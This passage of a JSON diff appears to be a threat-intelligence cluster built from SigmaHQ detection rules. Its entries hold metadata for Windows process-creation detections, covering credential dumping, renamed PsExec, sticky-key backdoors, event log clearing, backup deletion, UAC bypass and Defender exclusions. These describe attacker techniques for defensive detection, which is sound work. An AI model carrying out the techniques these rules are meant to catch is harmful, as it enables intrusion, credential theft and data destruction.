+ "author": "Florian Roth", + "creation_date": "2021/08/16", + "falsepositive": [ + "Legitimate use of procdump by a developer or administrator" + ], + "filename": "proc_creation_win_procdump.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_procdump.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" + ] + }, + "uuid": "2e65275c-8288-4ab4-aeb7-6274f58b6b20", + "value": "Procdump Usage" + }, + { + "description": 
"Identifies suspicious mshta.exe commands.", + "meta": { + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_mshta_javascript.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/6bc283c4-21f2-4aed-a05c-a9a3ffa95dd4.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.005/T1218.005.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_javascript.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.005" + ] + }, + "uuid": "67f113fa-e23d-4271-befa-30113b3e08b1", + "value": "Mshta JavaScript Execution" + }, + { + "description": "Detects execution of ruby using the \"-e\" flag. This is could be used as a way to launch a reverse shell or execute live ruby code.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2023/01/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_ruby_inline_command_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", + "https://www.revshells.com/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ruby_inline_command_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "20a5ffa1-3848-4584-b6f8-c7c7fd9f69c8", + "value": "Ruby Inline Command Execution" + }, + { + "description": "Threat actors performed dumping of SAM, SECURITY and SYSTEM registry hives using DelegateExecute key", + "meta": { + "author": "frack113", + "creation_date": "2021/12/20", + "falsepositive": [ + "Unknown" + ], + 
"filename": "proc_creation_win_susp_reg_open_command.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/12/13/diavol-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_reg_open_command.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ] + }, + "uuid": "dd3ee8cc-f751-41c9-ba53-5a32ed47e563", + "value": "Suspicious Reg Add Open Command" + }, + { + "description": "Detects the execution of a renamed PsExec often used by attackers or malware", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/05/21", + "falsepositive": [ + "Software that illegaly integrates PsExec in a renamed form", + "Administrators that have renamed PsExec and no one knows why" + ], + "filename": "proc_creation_win_renamed_psexec.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_psexec.yml" + ], + "tags": [ + "car.2013-05-009", + "attack.defense_evasion", + "attack.t1036.003" + ] + }, + "uuid": "a7a7e0e5-1d57-49df-9c58-9fe5bc0346a2", + "value": "Renamed PsExec" + }, + { + "description": "Detects suspicious file execution by wscript and cscript", + "meta": { + "author": "Michael Haag", + "creation_date": "2019/01/16", + "falsepositive": [ + "Will need to be tuned. I recommend adding the user profile path in CommandLine if it is getting too noisy." 
+ ], + "filename": "proc_creation_win_susp_script_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_script_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" + ] + }, + "uuid": "1e33157c-53b1-41ad-bbcc-780b80b58288", + "value": "WSF/JSE/JS/VBA/VBE File Execution" + }, + { + "description": "Detects a suspicious parent of csc.exe, which could by a sign of payload delivery", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/02/11", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_csc.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1094924091256176641", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_csc.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.t1059.007", + "attack.defense_evasion", + "attack.t1218.005", + "attack.t1027.004" + ] + }, + "uuid": "b730a276-6b63-41b8-bcf8-55930c8fc6ee", + "value": "Suspicious Parent of Csc.exe" + }, + { + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_invoke_obfuscation_via_var.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_var.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": 
"e9f55347-2928-4c06-88e5-1a7f8169942e", + "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION" + }, + { + "description": "Qbot used reg.exe to add Defender folder exceptions for folders within AppData and ProgramData.", + "meta": { + "author": "frack113", + "creation_date": "2022/02/13", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_reg_defender_exclusion.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/threat-detection-report/threats/qbot/", + "https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_defender_exclusion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "48917adc-a28e-4f5d-b729-11e75da8941f", + "value": "Registry Defender Exclusions" + }, + { + "description": "By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system.\nWhen the sticky keys are \"activated\" the privilleged shell is launched.\n", + "meta": { + "author": "Sreeman", + "creation_date": "2020/02/18", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_sticky_keys_unauthenticated_privileged_cmd_access.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.clearskysec.com/wp-content/uploads/2020/02/ClearSky-Fox-Kitten-Campaign-v1.pdf", + "https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sticky_keys_unauthenticated_privileged_cmd_access.yml" + ], + "tags": [ + "attack.t1546.008", + "attack.privilege_escalation" + ] + }, + "uuid": "1070db9a-3e5d-412e-8e7b-7183b616e1b3", + 
"value": "Sticky-Key Backdoor Copy Cmd.exe" + }, + { + "description": "Detects Golden Chickens deployment method as used by Evilnum in report published in July 2020", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/07/10", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_evilnum_jul20.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/", + "https://app.any.run/tasks/33d37fdf-158d-4930-aa68-813e1d5eb8ba/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_evilnum_jul20.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ] + }, + "uuid": "8acf3cfa-1e8c-4099-83de-a0c4038e18f0", + "value": "EvilNum Golden Chickens Deployment via OCX Files" + }, + { + "description": "Detects when adversaries stop services or processes by deleting their respective schdueled tasks in order to conduct data destructive activities", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/09", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_susp_schtasks_delete.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_delete.yml" + ], + "tags": [ + "attack.impact", + "attack.t1489" + ] + }, + "uuid": "dbc1f800-0fe0-4bc0-9c66-292c2abe3f78", + "value": "Delete Important Scheduled Task" + }, + { + "description": "The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2020/05/22", + "falsepositive": [ + "Unknown" + ], + "filename": 
"proc_creation_win_susp_crackmapexec_powershell_obfuscation.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/byt3bl33d3r/CrackMapExec", + "https://github.com/byt3bl33d3r/CrackMapExec/blob/0a49f75347b625e81ee6aa8c33d3970b5515ea9e/cme/helpers/powershell.py#L242", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_crackmapexec_powershell_obfuscation.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027.005" + ] + }, + "uuid": "6f8b3439-a203-45dc-a88b-abf57ea15ccf", + "value": "CrackMapExec PowerShell Obfuscation" + }, + { + "description": "Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack", + "meta": { + "author": "Trent Liffick", + "creation_date": "2020/05/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_findstr_lnk.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.bleepingcomputer.com/news/security/hhsgov-open-redirect-used-by-coronavirus-phishing-to-spread-malware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_findstr_lnk.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1202", + "attack.t1027.003" + ] + }, + "uuid": "33339be3-148b-4e16-af56-ad16ec6c7e7b", + "value": "Findstr Launching .lnk File" + }, + { + "description": "Detects when an admin share is mounted using net.exe", + "meta": { + "author": "oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, wagga", + "creation_date": "2020/10/05", + "falsepositive": [ + "Administrators" + ], + "filename": "proc_creation_win_net_use_admin_share.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ 
+ "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_use_admin_share.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "3abd6094-7027-475f-9630-8ab9be7b9725", + "value": "Mounted Windows Admin Shares with net.exe" + }, + { + "description": "Deletes the Windows systemstatebackup using wbadmin.exe.\nThis technique is used by numerous ransomware families.\nThis may only be successful on server platforms that have Windows Backup enabled.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/13", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_delete_systemstatebackup.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_delete_systemstatebackup.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ] + }, + "uuid": "89f75308-5b1b-4390-b2d8-d6b2340efaf8", + "value": "Wbadmin Delete Systemstatebackup" + }, + { + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "meta": { + "author": "frack113", + "creation_date": "2021/07/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_zip_compress.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_zip_compress.yml" + ], + "tags": [ + "attack.collection", + "attack.t1074.001" + ] + }, + "uuid": "85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98", + "value": "Zip A Folder With PowerShell For Staging In Temp" + }, + { + "description": "Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others).", + "meta": { + "author": "Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105", + "creation_date": "2019/09/26", + "falsepositive": [ + "Admin activity", + "Scripts and administrative tools used in the monitored environment" + ], + "filename": "proc_creation_win_susp_eventlog_clear.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md", + "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.001", + "attack.t1562.002", + "car.2016-04-002" + ] + }, + "uuid": "cc36992a-4671-4f21-a91d-6c2b72a2edf5", + "value": "Suspicious Eventlog Clear or Configuration Using Wevtutil" + }, + { + "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", + "meta": { + "author": "Florian Roth, @twjackomo, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2018/03/15", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_stickykey_like_backdoor.yml", + "level": 
"critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_stickykey_like_backdoor.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.008", + "car.2014-11-003", + "car.2014-11-008" + ] + }, + "uuid": "2fdefcb3-dbda-401e-ae23-f0db027628bc", + "value": "Sticky Key Like Backdoor Usage" + }, + { + "description": "Looks for changes to registry to disable any write-protect property for storage devices. This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group.", + "meta": { + "author": "Sreeman", + "creation_date": "2021/06/11", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_write_protect_for_storage_disabled.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_write_protect_for_storage_disabled.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562" + ] + }, + "uuid": "75f7a0e2-7154-4c4d-9eae-5cdb4e0a5c13", + "value": "Write Protect For Storage Disabled" + }, + { + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting", + "meta": { + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "creation_date": "2019/10/26", + "falsepositive": [ + "Commandlines containing components like cmd accidentally", + "Jobs and services started with cmd" + ], + "filename": "proc_creation_win_meterpreter_or_cobaltstrike_getsystem_service_start.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_meterpreter_or_cobaltstrike_getsystem_service_start.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1134.001", + "attack.t1134.002" + ] + }, + "uuid": "15619216-e993-4721-b590-4c520615a67d", + "value": "Meterpreter or Cobalt Strike Getsystem Service Start" + }, + { + "description": "Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/11/24", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_lolbin_susp_certreq_download.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Certreq/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "4480827a-9799-4232-b2c4-ccc6c4e9e12b", + "value": "Suspicious Certreq Command to Download" + }, + { + "description": "Detects a windows service to be stopped", + "meta": { + "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali", + "creation_date": "2019/10/23", + "falsepositive": [ + "Administrator shutting down the service due to upgrade or removal purposes" + ], + "filename": "proc_creation_win_service_stop.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_service_stop.yml" + ], + "tags": [ + "attack.impact", + "attack.t1489" + ] + }, + "uuid": 
"eb87818d-db5d-49cc-a987-d5da331fbd90", + "value": "Stop Windows Service" + }, + { + "description": "Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)", + "meta": { + "author": "Max Altgelt", + "creation_date": "2022/06/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_renamed_browsercore.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mariuszbit/status/1531631015139102720", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_browsercore.yml" + ], + "tags": [ + "attack.t1528", + "attack.t1036.003" + ] + }, + "uuid": "8a4519e8-e64a-40b6-ae85-ba8ad2177559", + "value": "Process Creation with Renamed BrowserCore.exe" + }, + { + "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", + "meta": { + "author": "frack113", + "creation_date": "2021/12/10", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_network_listing_connections.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-1---system-network-connections-discovery", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_network_listing_connections.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1049" + ] + }, + "uuid": "1c67a717-32ba-409b-a45d-0fb704a73a81", + "value": "Suspicious Listing of Network Connections" + }, + { + "description": "Use OfflineScannerShell.exe to execute mpclient.dll library in the current working directory", + "meta": { + "author": "frack113", + "creation_date": 
"2022/03/06", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_offlinescannershell.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/OfflineScannerShell/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_offlinescannershell.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "02b18447-ea83-4b1b-8805-714a8a34546a", + "value": "Suspicious OfflineScannerShell.exe Execution From Another Folder" + }, + { + "description": "Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/18", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_pua_seatbelt.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.bluetangle.dev/2022/08/fastening-seatbelt-on-threat-hunting.html", + "https://github.com/GhostPack/Seatbelt", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_seatbelt.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1526", + "attack.t1087", + "attack.t1083" + ] + }, + "uuid": "38646daa-e78f-4ace-9de0-55547b2d30da", + "value": "Seatbelt PUA Tool" + }, + { + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_winsat.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_winsat.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "7a01183d-71a2-46ad-ad5c-acd989ac1793", + "value": "UAC Bypass Abusing Winsat Path Parsing - Process" + }, + { + "description": "Detects suspicious addition to BitLocker related registry keys via the reg.exe utility", + "meta": { + "author": "frack113", + "creation_date": "2021/11/15", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_susp_reg_bitlocker.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_reg_bitlocker.yml" + ], + "tags": [ + "attack.impact", + "attack.t1486" + ] + }, + "uuid": "0e0255bf-2548-47b8-9582-c0955c9283f5", + "value": "Suspicious Reg Add BitLocker" + }, + { + "description": "Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/19", + "falsepositive": [ + "Legitimate usage of the script by a developer" + ], + "filename": "proc_creation_win_lolbin_launch_vsdevshell.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/nas_bench/status/1535981653239255040", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216.001" + ] + }, + "uuid": "45d3a03d-f441-458c-8883-df101a3bb146", + "value": "Launch-VsDevShell.PS1 Proxy Execution" + }, + { + "description": "Detects Windows Installer service (msiexec.exe) trying 
to install MSI packages with SYSTEM privilege", + "meta": { + "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "System administrator usage", + "Anti virus products" + ], + "filename": "proc_creation_win_always_install_elevated_windows_installer.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-48-638.jpg", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_always_install_elevated_windows_installer.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "cd951fdc-4b2f-47f5-ba99-a33bf61e3770", + "value": "Always Install Elevated Windows Installer" + }, + { + "description": "Detects sdiagnhost.exe calling a suspicious child process (e.g. 
used in exploits for Follina / CVE-2022-30190)", + "meta": { + "author": "Nextron Systems", + "creation_date": "2022/06/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_sdiagnhost_susp_child.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/f420d295-0457-4e9b-9b9e-6732be227583/", + "https://app.any.run/tasks/c4117d9a-f463-461a-b90f-4cd258746798/", + "https://twitter.com/nao_sec/status/1530196847679401984", + "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdiagnhost_susp_child.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1218" + ] + }, + "uuid": "f3d39c45-de1a-4486-a687-ab126124f744", + "value": "Sdiagnhost Calling Suspicious Child Process" + }, + { + "description": "Detect attacker collecting audio via SoundRecorder application.", + "meta": { + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate audio capture by legitimate user." 
+ ], + "filename": "proc_creation_win_soundrec_audio_capture.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/f72a98cb-7b3d-4100-99c3-a138b6e9ff6e.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_soundrec_audio_capture.yml" + ], + "tags": [ + "attack.collection", + "attack.t1123" + ] + }, + "uuid": "83865853-59aa-449e-9600-74b9d89a6d6e", + "value": "Audio Capture via SoundRecorder" + }, + { + "description": "Uses the .NET InstallUtil.exe application in order to execute image without log", + "meta": { + "author": "frack113", + "creation_date": "2022/01/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_instalutil.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool", + "https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_instalutil.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "d042284c-a296-4988-9be5-f424fadcc28c", + "value": "Suspicious Execution of InstallUtil Without Log" + }, + { + "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/09", + "falsepositive": [ + "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" + ], + "filename": "proc_creation_win_user_discovery_get_aduser.yml", + "level": "medium", + 
"logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_user_discovery_get_aduser.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033" + ] + }, + "uuid": "1114e048-b69c-4f41-bc20-657245ae6e3f", + "value": "User Discovery And Export Via Get-ADUser Cmdlet" + }, + { + "description": "Detects suspicious shell spawn from MSSQL process, this might be sight of RCE or SQL Injection", + "meta": { + "author": "FPT.EagleEye Team, wagga", + "creation_date": "2020/12/11", + "falsepositive": "No established falsepositives", + "filename": "proc_creation_win_susp_shell_spawn_from_mssql.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_from_mssql.yml" + ], + "tags": [ + "attack.t1505.003", + "attack.t1190", + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" + ] + }, + "uuid": "869b9ca7-9ea2-4a5a-8325-e80e62f75445", + "value": "Suspicious Shells Spawn by SQL Server" + }, + { + "description": "Detects specific combinations of encoding methods in the PowerShell command lines", + "meta": { + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", + "creation_date": "2022/07/06", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_powershell_cmdline_susp_comb_methods.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65", + 
